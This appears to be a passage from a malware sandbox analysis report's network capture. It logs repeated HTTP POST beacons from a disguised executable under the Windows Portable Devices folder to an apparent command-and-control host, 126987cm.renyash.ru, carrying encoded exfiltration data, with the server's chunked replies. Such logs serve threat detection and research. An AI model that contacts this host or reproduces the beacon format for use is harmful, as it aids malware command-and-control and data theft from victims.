                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2515&min_rtt=1614&rtt_var=2409&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1417&delivery_rate=165364&cwnd=213&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                93192.168.2.450093172.67.220.19880180C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 1, 2025 21:48:35.625643015 CET345OUTPOST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 1, 2025 21:48:35.983638048 CET1072OUTData Raw: 54 50 5e 55 53 40 59 52 5d 56 5b 57 54 5d 51 5b 58 56 58 59 5b 51 57 47 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: TP^US@YR]V[WT]Q[XVXY[QWGVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ["'2Z "!.$$[3"*''Q"5$*Y(%">-8^&:!^&%X*#
                                                                                                                                Jan 1, 2025 21:48:36.077939034 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:48:36.334625006 CET807INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:36 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=b7idhmKgNJIPqVWudmNPnlUMDlb5tEqkUA8MBA%2FHB%2BCLqqssZoQqBzbn3%2FWruoGoAzq9k5tkbl4Uh8Jm5955ze4sl5s0SYitbRRrhxAYjG5jiC5qANsm3E4XdCXSIiLYc9Xa%2Fjov"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55f012ef90f64-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2337&min_rtt=1727&rtt_var=1868&sent=4&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1417&delivery_rate=220844&cwnd=232&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                94192.168.2.450099172.67.220.19880180C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 1, 2025 21:48:36.463793993 CET345OUTPOST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 1, 2025 21:48:36.811822891 CET1072OUTData Raw: 51 51 5b 54 53 41 59 51 5d 56 5b 57 54 58 51 58 58 5c 58 51 5b 5e 57 47 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: QQ[TSAYQ]V[WTXQXX\XQ[^WGVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[!0T?Z"">!.+'(^6;+T($W#5R%0!*!(+2:!^&%X*7


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                95192.168.2.450102172.67.220.19880180C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 1, 2025 21:48:36.927000999 CET345OUTPOST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1788
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 1, 2025 21:48:37.294218063 CET1788OUTData Raw: 54 54 5b 53 53 47 5c 55 5d 56 5b 57 54 59 51 5a 58 54 58 5e 5b 5f 57 45 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: TT[SSG\U]V[WTYQZXTX^[_WEVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ["$!'X#2"5=7$(58 <B+6<'V2Z=&=D?._&:!^&%X*3
                                                                                                                                Jan 1, 2025 21:48:37.392102957 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:48:37.663213968 CET948INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:37 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qn7GvOg4Yq0SlHjZqjPkNwfTqLtumI4esTeWpOxn5PeDkh6XtCMP1TyXd1HRvEahezCtKRiSdptlkzkJGc1opHVa7dqK6NqjBlBSOfwk61rPUK0TRKkyXcb6HtefGfvFAU55yjrh"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55f096a8778d3-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=7984&min_rtt=1980&rtt_var=12750&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2133&delivery_rate=29192&cwnd=209&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 39 38 0d 0a 02 1e 22 0e 2a 36 2b 52 20 0c 0c 0f 3d 2b 2b 13 25 22 32 5d 32 23 22 18 3c 06 3b 5d 3c 11 23 09 32 3c 33 02 30 14 35 1a 3f 0b 38 11 3e 36 20 5c 05 1b 3a 07 24 07 2b 1c 26 3b 2d 1e 3d 30 02 5d 37 3f 3e 12 29 0d 20 54 23 3b 2a 03 32 38 3e 0e 24 3a 31 0c 3c 3c 33 15 29 1e 3c 0c 25 17 2a 51 0f 16 3b 0e 29 0e 3a 11 2a 12 28 5a 30 0f 23 03 36 26 22 09 26 3b 34 0e 26 3a 21 05 3f 3d 20 08 22 0d 20 0f 25 3c 2e 13 26 00 2c 0c 2c 3a 26 5e 20 01 22 53 02 3f 55 56 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 98"*6+R =++%"2]2#"<;]<#2<305?8>6 \:$+&;-=0]7?>) T#;*28>$:1<<3)<%*Q;):*(Z0#6&"&;4&:!?= " %<.&,,:&^ "S?UV0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                96192.168.2.450103172.67.220.19880180C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 1, 2025 21:48:37.048434019 CET345OUTPOST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 1, 2025 21:48:37.408907890 CET1072OUTData Raw: 54 52 5b 57 53 44 5c 56 5d 56 5b 57 54 55 51 52 58 57 58 59 5b 57 57 41 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: TR[WSD\V]V[WTUQRXWXY[WWAVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ["$#[421".8$,_!(+S($$!6(R%32[*&>.<^%:!^&%X*
                                                                                                                                Jan 1, 2025 21:48:37.495807886 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:48:37.760916948 CET805INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:37 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ot4sRPqdQZBNwEc%2FuS4jYsitpWiccViux2Xpr8uwD0pBOidUjBPMHMV8woHUbzbPzNfDi4QS%2BDixMDbamcFYh7d8aKuSgv8ZrCZUT2oqSZoGPiQBwcevp4XR3p8YVR9Wo0Yk%2FdTw"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55f0a09e67c99-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2533&min_rtt=1838&rtt_var=2079&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1417&delivery_rate=197297&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                97192.168.2.450104172.67.220.19880180C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 1, 2025 21:48:37.893135071 CET321OUTPOST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Jan 1, 2025 21:48:38.249381065 CET1072OUTData Raw: 54 51 5b 5f 56 4b 5c 51 5d 56 5b 57 54 5d 51 52 58 50 58 5e 5b 55 57 46 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: TQ[_VK\Q]V[WT]QRXPX^[UWFVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ["$T;X72*5.[0>$^! ?44"5$U05(5!E<>2!^&%X*#
                                                                                                                                Jan 1, 2025 21:48:38.366071939 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:48:38.639494896 CET808INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:38 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=f%2F%2Fbb%2Bz3MTTphzQUjjs%2FotIfl%2ByveoUePcqtsqmzZFwDmuLaUtyk0S1HylcQJqOCsydbgLSwYWvwWQ0Xf6szlaiI7gpbhdecmpMNGywgcMM49vSHrH2AFZ5nQdZVuMRSXSrDzK6v"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55f0f7eaf8cd6-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3716&min_rtt=2081&rtt_var=4051&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1393&delivery_rate=96274&cwnd=173&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                98192.168.2.450105172.67.220.19880180C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 1, 2025 21:48:38.770010948 CET345OUTPOST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 1, 2025 21:48:39.124243975 CET1072OUTData Raw: 51 55 5b 52 56 47 5c 56 5d 56 5b 57 54 5b 51 52 58 5d 58 5e 5b 52 57 45 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: QU[RVG\V]V[WT[QRX]X^[RWEVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[!X32X "">;^$-#8<($;!C;302)&6+3%:!^&%X*
                                                                                                                                Jan 1, 2025 21:48:39.321049929 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:48:39.667673111 CET806INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:39 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vzK%2Bb%2BhG1FSRxCXj0Cn3OlAtmzlDCnfDP2FYfH2QzSayISDn2ULL8FptPeNUofGWM1KEO7Lu3uu1RhAGii%2Bce1DS42YoZz9xKMfUhLqUvZwB2xJNqEaYqLZ%2FHyzX1vqQGg3ze4Ee"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55f14cc4e0f69-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3940&min_rtt=1600&rtt_var=5280&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1417&delivery_rate=71843&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                99192.168.2.450106172.67.220.19880180C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 1, 2025 21:48:39.859203100 CET345OUTPOST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 1, 2025 21:48:40.301974058 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:48:40.331223011 CET1072OUTData Raw: 54 5f 5b 55 56 47 59 55 5d 56 5b 57 54 58 51 5f 58 5d 58 58 5b 57 57 47 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: T_[UVGYU]V[WTXQ_X]XX[WWGVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[!3"""=\! 0+!+,?'?#%<30%(6?#1!^&%X*7
                                                                                                                                Jan 1, 2025 21:48:40.632659912 CET803INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:40 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kgnqHcunTIBhMd5k1dU67fMAyEEmkQ1bmpfRcJrqvbTnmSjuV1%2B8u0I5sweUQ4b9xNUVO3WLgEbEoVWpy%2FThAxfjHYbh3taZ4V222IfOH27m37azhX1DR8WvSj8sRy3fUXi67mPq"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55f1b9ec642c4-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=6660&min_rtt=1619&rtt_var=10689&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1417&delivery_rate=34804&cwnd=210&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                100192.168.2.450107172.67.220.19880180C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 1, 2025 21:48:40.751832962 CET345OUTPOST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 1, 2025 21:48:41.108598948 CET1072OUTData Raw: 54 5f 5b 57 56 41 59 5f 5d 56 5b 57 54 59 51 5a 58 54 58 59 5b 54 57 46 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: T_[WVAY_]V[WTYQZXTXY[TWFVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[!0;_#!]6+Z'Z";U('$#&4' 9)9(&!^&%X*3
                                                                                                                                Jan 1, 2025 21:48:41.199378967 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:48:41.375467062 CET807INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:41 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GvoFd1LiQyzmN05p8f4uvbXjDCiQ65qXXXkIhmoOsz8WvAZwrsIzkH3aeaHv%2Bomn%2FXjIDWwdX7Dvs5bF2A9w2FIx%2B7l9DicFJozFEmTaUjzWFmLsHxhbyGR5xdC%2F3FCJz7miH3Qb"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55f213a964345-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1817&min_rtt=1590&rtt_var=1052&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1417&delivery_rate=427776&cwnd=218&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                101192.168.2.450108172.67.220.19880180C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 1, 2025 21:48:41.504513979 CET345OUTPOST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 1, 2025 21:48:41.858601093 CET1072OUTData Raw: 51 54 5b 52 56 40 59 54 5d 56 5b 57 54 5a 51 53 58 53 58 51 5b 52 57 49 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: QT[RV@YT]V[WTZQSXSXQ[RWIVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ["01 "-$'=5;<(<"%(':[*69?(^&:!^&%X*?
                                                                                                                                Jan 1, 2025 21:48:41.969605923 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:48:42.240801096 CET800INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:42 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fXmSSWY4NKDMpGdiykxVFtp8GitUiK9IyVZIBPH0DZVY%2Fuh77fUwLdiyARL8cOlRMdhIAAv1JbHoTI4sere9YsYNa05Xe6M8GSTD37hX0hMsAs6o1m7vuRSuJRTjKs7bvCc8jNmT"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55f25fb4a4368-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3770&min_rtt=1562&rtt_var=5003&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1417&delivery_rate=75919&cwnd=232&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
